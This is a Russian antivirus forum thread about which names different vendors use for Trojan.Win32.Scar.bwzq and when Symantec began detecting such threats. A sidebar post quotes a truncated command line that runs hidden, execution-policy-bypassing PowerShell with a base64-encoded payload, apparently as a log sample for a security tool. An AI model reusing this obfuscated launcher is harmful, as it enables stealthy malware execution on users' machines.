Перейти к содержанию
komsa80

Trojan.Win32.Scar.bwzq

Recommended Posts

komsa80

Доброго времени суток!

Возникла проблема, знакомый принес лог Касперского в котором указан обнаруженный троян Trojan.Win32.Scar.bwzq

Утверждает, флешка вставлялась в моей сетке, на компьютере пользователя (где якобы вставлялась флешка) стоит SEP 11.05 базы от 17 октября.

В заявлении знакомого сильно сомневаюсь, в понедельник подробно посмотрю логи, но в связи с этим возникает вопрос, где можно посмотреть соответствие названий детектируемых вирусов в разных антивирусах c базой symantec. Попытался взять с Securelist, но там указано сооветствие для NAV, а оно слишком общее.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.

Mal/FakeAV-DD (Sophos)

Trojan.Packed.20032 (DrWeb)

Win32/Spy.Shiz.NAL trojan (Nod32)

Gen:Variant.FakeAlert.4 (BitDef7)

Trojan.Scar.QXG (VirusBuster)

Win32:Malware-gen (AVAST)

Trojan.Win32.Scar (Ikarus)

SHeur3.LEB (AVG)

TR/Scar.bwzq (AVIRA)

Trojan.Gen (NAV)

Trojan.Win32.Generic.51FF5860 (Rising)

Trojan.Win32.Scar.bwzq [AVP] (FSecure)

Packed.Win32.Anon.a (v) (Sunbelt)

Trojan.Scar.QXG (VirusBusterBeta)

--

Нормальное название. Точнее у Симантека вердикта для него нет.

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
komsa80
Mal/FakeAV-DD (Sophos)

Trojan.Packed.20032 (DrWeb)

Win32/Spy.Shiz.NAL trojan (Nod32)

Gen:Variant.FakeAlert.4 (BitDef7)

Trojan.Scar.QXG (VirusBuster)

Win32:Malware-gen (AVAST)

Trojan.Win32.Scar (Ikarus)

SHeur3.LEB (AVG)

TR/Scar.bwzq (AVIRA)

Trojan.Gen (NAV)

Trojan.Win32.Generic.51FF5860 (Rising)

Trojan.Win32.Scar.bwzq [AVP] (FSecure)

Packed.Win32.Anon.a (v) (Sunbelt)

Trojan.Scar.QXG (VirusBusterBeta)

--

Нормальное название. Точнее у Симантека вердикта для него нет.

Название нормальное, возникает вопрос, когда Симантек его начал обнаруживать?

Судя по Касперскому (конец марта) и Симантек должен в те же сроки, но хотелось бы большей определенности.

Бывает Каспер обнаружил свежий вирус, а при таком соответствии сидишь и гадаешь ловит его Семантек или еще нет.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
DaTa

отправить файл в вирлаб. Бот нарисует начальные сертифицированные дефки, которые уже детектят мышь.

Да, у каждого вирлаба свои строки. Вот например был случай что Майкрософт детектил руткит Eclipse(Backdoor:WinNT/Festi.C) уже 5 февраля 2010, а Касперские начали детектить только 19.10.2010 13:25(Rootkit.Win32.Tent.cdr) через пол часа после отправки семпла в вирлаб, Симантек того же дня (Hacktool.Rootkit) но чуть позже.

Да кстати, не рекомендую пользователям домашних версий Нортона отключать сигнатуру "Средства взлома" в исключениях "Защита реального времени и Sonar" для смягчения реакции на кряки и кейгены. Как видите под этой сигнатурой (англ. версия сигнатуры: Hacktool) Симантек детектитрует большинство руткитов и буткитов (сигнатура Hacktool.Rootkit). Отключение даной сигнатуры очень не желательно и может привести к весьма неприятным последствиям для пользователей 32-разрядных версий Windows.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×